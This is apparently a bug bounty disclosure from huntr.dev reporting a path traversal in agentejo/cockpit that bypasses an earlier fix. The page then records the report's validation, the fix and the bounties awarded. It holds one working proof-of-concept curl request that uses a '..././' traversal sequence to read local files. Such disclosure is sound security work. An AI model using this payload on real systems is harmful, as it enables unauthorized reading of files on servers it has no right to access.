External Control of File Name or Path in agentejo/cockpit

Valid

Reported on

Sep 9th 2021

✍️ Description

Bypass of previous fix

🕵️‍♂️ Proof of Concept

I see you recently fixed local-file-inclusion bug https://huntr.dev/bounties/a65d700c-1561-46c1-a9c2-cba6ed960f94/.
And the fixed patch is https://github.com/agentejo/cockpit/commit/f1919184998bf9fa7a7db882c98ce1410375e596 .
But it can be bypassed easilly using bellow url

curl --path-as-is http://10.0.2.15:8080/api/public/..././custom?test=win

💥 Impact

local file read

Occurrences

We have contacted a member of the agentejo/cockpit team and are waiting to hear back 2 years ago
Artur validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Artur marked this as fixed with commit d1ea9f 2 years ago
Artur has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation